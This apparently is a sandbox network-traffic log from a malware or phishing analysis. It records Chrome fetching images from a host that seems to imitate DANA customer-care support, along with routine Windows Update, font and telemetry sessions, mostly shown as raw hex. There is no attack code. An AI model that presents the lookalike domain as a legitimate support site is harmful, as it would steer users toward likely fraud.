                                                  2024-10-13 17:33:29 UTC1369INData Raw: 25 3a a0 0a d5 06 7b 7a dd 0f 03 9d 89 b5 74 3d 70 71 b2 9a 3f 11 51 6f 6f 6f da c7 17 4a fa 23 5e 61 e7 81 53 9c 73 17 48 9a 51 bb 09 c8 e5 72 23 3a 9d ce c8 6f 19 ec a2 3b 10 ef 67 04 ff b2 3d 9f d2 fb 23 e7 dc f5 89 15 dd 52 cc 4c ce b9 9b 18 6c ec 3c 83 d2 c7 61 a8 f3 62 e0 27 c0 d7 24 f5 e1 95 c8 41 78 25 dd 74 76 6e ab 91 8f 61 3f 7f a8 8f b7 99 6d 88 e3 f8 5a 4a f7 1f 01 c7 01 97 4b 5a d8 e4 42 7f ab 78 05 b0 40 12 92 36 02 69 a9 83 a7 f1 69 eb e9 38 3e 02 f8 a7 66 2e d0 f4 cd c9 c7 9e 2e 74 ce 9d 93 cf e7 af a0 b4 8a f9 58 1c c7 9f e8 ec ec 7c 34 63 3b 3b e1 17 32 c0 5b 90 bf be e8 a2 8b 36 03 5c 73 cd 35 5b 80 ab d2 63 cd ec 28 fc 22 5a 53 22 97 b5 b3 02 f8 a4 99 3d 9a 7c 14 da 80 b7 3a e7 de d6 a2 70 be 7a 18 70 3c f0 6f f8 99 81 03 6e ee eb eb
                                                  Data Ascii: %:{zt=pq?QoooJ#^aSsHQr#:o;g=#RLl<ab'$Ax%tvna?mZJKZBx@6ii8>f..tX|4c;;2[6\s5[c("ZS"=|:pzp<on
                                                  2024-10-13 17:33:29 UTC1369INData Raw: b6 19 c0 cc d6 46 51 f4 b9 62 b1 f8 7a 7c 28 6e 1a ed 64 c0 de 92 3e 0b 9c df 4c 72 48 03 61 76 27 e1 8d 0c f0 89 59 bf 4e dc 1c 95 3c 84 0f 91 4c 39 11 6f 90 0e 1f f9 42 32 e7 aa 44 d5 62 49 f2 05 8e fe 45 d2 9d 1a 5c 1a f3 9b aa 51 48 48 be 48 cd c3 69 db c9 4a 6e d5 87 24 5f 8c e4 2f 65 ed af 95 f4 82 6a c7 56 9c 57 5e 2c e9 81 5a 8b 09 f2 05 9f fe 47 a5 2a 6a 03 92 2e 5f b7 6e dd cc 8a e3 de a1 52 11 99 bb b3 7c ad e5 8b c8 94 d7 06 be 54 d2 41 1a 5c fd cc c9 57 b0 6b d9 76 39 8d 20 e9 b8 32 59 14 c7 f1 05 f5 2c 2b ed 58 2c e9 6f db b6 6d 1b 32 ba 20 19 2b 3f 4d 2a 0b 4a be 20 d1 15 eb d7 af 9f 55 71 dc 6b 54 2a 96 f4 0f d5 a8 43 9c 60 f2 35 98 cb a9 5b 2c a9 ce bd cd 97 b4 a6 ac bd 95 4a aa 93 49 7a 86 a4 0d 65 bf db 5a 28 14 46 6c 36 20 3f fe ef 2d
                                                  Data Ascii: FQbz|(nd>LrHav'YN<L9oB2DbIE\QHHHiJn$_/ejVW^,ZG*j._nR|TA\Wkv9 2Y,+X,om2 +?M*J UqkT*C`5[,JIzeZ(Fl6 ?-


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.449782172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:29 UTC639OUTGET /ast/img/indo.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:29 UTC691INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:29 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 741
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:23:12 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7075
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6lIFFegKDV1z9YllhPA3MVjerBBrGv7avdp90ICdz8xVVvY%2FdEHOw23skUrqBytccT0ACLOuxJygRjDqxKwoUjqbH%2B3TdVEW8vZmsLoN%2BeUVLxiw2m3gKuYrLIy2I6GzadI%2Fu9Srmjo0Uz8FvEgLb4YvM07qwXhzyEs%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d2113327e140c96-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:29 UTC678INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 2d 08 03 00 00 00 0e 73 1c 80 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 cc 50 4c 54 45 ff 13 01 ff 19 01 ff 14 01 ff 00 01 ff 14 00 f5 f5 f5 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
                                                  Data Ascii: PNGIHDRP-sgAMAa cHRMz&u0`:pQ<PLTE
                                                  2024-10-13 17:33:29 UTC63INData Raw: 00 00 28 74 45 58 74 64 61 74 65 3a 74 69 6d 65 73 74 61 6d 70 00 32 30 32 32 2d 31 30 2d 32 39 54 30 34 3a 34 32 3a 31 39 2b 30 30 3a 30 30 45 03 1f 2a 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                  Data Ascii: (tEXtdate:timestamp2022-10-29T04:42:19+00:00E*IENDB`


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.449781184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                  Range: bytes=0-2147483646
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-10-13 17:33:29 UTC515INHTTP/1.1 200 OK
                                                  ApiVersion: Distribute 1.1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF06)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-weu-z1
                                                  Cache-Control: public, max-age=169867
                                                  Date: Sun, 13 Oct 2024 17:33:29 GMT
                                                  Content-Length: 55
                                                  Connection: close
                                                  X-CID: 2
                                                  2024-10-13 17:33:29 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.449785104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:30 UTC379OUTGET /ast/img/indo.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:30 UTC699INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:30 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 741
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:23:12 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTAvg7uzBNAaLHjQd%2BQLjKZgwzvhqNEQjsuhCSTRzu6cbqUwiN3yiLYzk0%2BZu%2BfMuyP34%2BmP9jL7V6XPReQshVz%2Fh8F8kcDeTMaHEF3taRXDbATZZZ4SB%2BD1uQRuvDlZ4sb%2B2mPv%2F4xXJXnLA6BXr6QNPSedaLh623M%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d2113380ec6c459-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:30 UTC670INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 2d 08 03 00 00 00 0e 73 1c 80 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 cc 50 4c 54 45 ff 13 01 ff 19 01 ff 14 01 ff 00 01 ff 14 00 f5 f5 f5 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
                                                  Data Ascii: PNGIHDRP-sgAMAa cHRMz&u0`:pQ<PLTE
                                                  2024-10-13 17:33:30 UTC71INData Raw: 3a 30 30 90 ae b4 c8 00 00 00 28 74 45 58 74 64 61 74 65 3a 74 69 6d 65 73 74 61 6d 70 00 32 30 32 32 2d 31 30 2d 32 39 54 30 34 3a 34 32 3a 31 39 2b 30 30 3a 30 30 45 03 1f 2a 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                  Data Ascii: :00(tEXtdate:timestamp2022-10-29T04:42:19+00:00E*IENDB`


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.449786172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:30 UTC634OUTGET /favicon.ico HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:31 UTC689INHTTP/1.1 404 Not Found
                                                  Date: Sun, 13 Oct 2024 17:33:31 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: EXPIRED
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UtFLnxrOceNUiReWd6AcFsKKBanqik7vlhUq5B1TiqpKFuzj4lGM5NHydcUVTFMHDNe9MiGScqtlkhyz4afCyYZ%2FVKpKfLUmcqGEPHMB5RHsSLMH8ngyojw3ktWGquAONjrZupqAwoAfG%2F8FXMX6UQT4WPaNezwP6kQ%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Speculation-Rules: "/cdn-cgi/speculation"
                                                  Server: cloudflare
                                                  CF-RAY: 8d21133b2d7942df-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:31 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                  2024-10-13 17:33:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.44978735.190.80.14435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:31 UTC590OUTOPTIONS /report/v4?s=UtFLnxrOceNUiReWd6AcFsKKBanqik7vlhUq5B1TiqpKFuzj4lGM5NHydcUVTFMHDNe9MiGScqtlkhyz4afCyYZ%2FVKpKfLUmcqGEPHMB5RHsSLMH8ngyojw3ktWGquAONjrZupqAwoAfG%2F8FXMX6UQT4WPaNezwP6kQ%3D HTTP/1.1
                                                  Host: a.nel.cloudflare.com
                                                  Connection: keep-alive
                                                  Origin: https://bantuan-customer-care-dana.officio.asia
                                                  Access-Control-Request-Method: POST
                                                  Access-Control-Request-Headers: content-type
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:31 UTC336INHTTP/1.1 200 OK
                                                  Content-Length: 0
                                                  access-control-max-age: 86400
                                                  access-control-allow-methods: OPTIONS, POST
                                                  access-control-allow-origin: *
                                                  access-control-allow-headers: content-type, content-length
                                                  date: Sun, 13 Oct 2024 17:33:31 GMT
                                                  Via: 1.1 google
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  29192.168.2.44978835.190.80.14435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:32 UTC508OUTPOST /report/v4?s=UtFLnxrOceNUiReWd6AcFsKKBanqik7vlhUq5B1TiqpKFuzj4lGM5NHydcUVTFMHDNe9MiGScqtlkhyz4afCyYZ%2FVKpKfLUmcqGEPHMB5RHsSLMH8ngyojw3ktWGquAONjrZupqAwoAfG%2F8FXMX6UQT4WPaNezwP6kQ%3D HTTP/1.1
                                                  Host: a.nel.cloudflare.com
                                                  Connection: keep-alive
                                                  Content-Length: 470
                                                  Content-Type: application/reports+json
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:32 UTC470OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 36 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 61 6e 74 75 61 6e 2d 63 75 73 74 6f 6d 65 72 2d 63 61 72 65 2d 64 61 6e 61 2e 6f 66 66 69 63 69 6f 2e 61 73 69 61 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 30 37 2e 31 37 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70
                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":1362,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://bantuan-customer-care-dana.officio.asia/","sampling_fraction":1.0,"server_ip":"172.67.207.178","status_code":404,"type":"http.error"},"typ
                                                  2024-10-13 17:33:32 UTC168INHTTP/1.1 200 OK
                                                  Content-Length: 0
                                                  date: Sun, 13 Oct 2024 17:33:32 GMT
                                                  Via: 1.1 google
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.44978952.149.20.212443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:35 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pXuLpORe9MOP3X4&MD=FYonS417 HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-10-13 17:33:35 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                  MS-CorrelationId: a8741628-d480-4966-814f-d06a34a8462a
                                                  MS-RequestId: 9ba6b977-5204-4571-8336-3ae60b0dc80e
                                                  MS-CV: 3gLra9lWT0KfMe5m.0
                                                  X-Microsoft-SLSClientCache: 2880
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Sun, 13 Oct 2024 17:33:34 GMT
                                                  Connection: close
                                                  Content-Length: 24490
                                                  2024-10-13 17:33:35 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                  2024-10-13 17:33:35 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  31192.168.2.44979552.149.20.212443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:14 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pXuLpORe9MOP3X4&MD=FYonS417 HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-10-13 17:34:14 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                  MS-CorrelationId: a5a7615d-a39c-46c3-a2dc-d2b606372ac2
                                                  MS-RequestId: f807caa7-6444-4ff9-8a1c-aff474ffdf4f
                                                  MS-CV: EZ9LSowraUChQUSj.0
                                                  X-Microsoft-SLSClientCache: 1440
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Sun, 13 Oct 2024 17:34:13 GMT
                                                  Connection: close
                                                  Content-Length: 30005
                                                  2024-10-13 17:34:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                  2024-10-13 17:34:14 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  32192.168.2.44979613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:16 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:16 UTC540INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:16 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 218853
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public
                                                  Last-Modified: Sun, 13 Oct 2024 10:59:53 GMT
                                                  ETag: "0x8DCEB762AD2C54E"
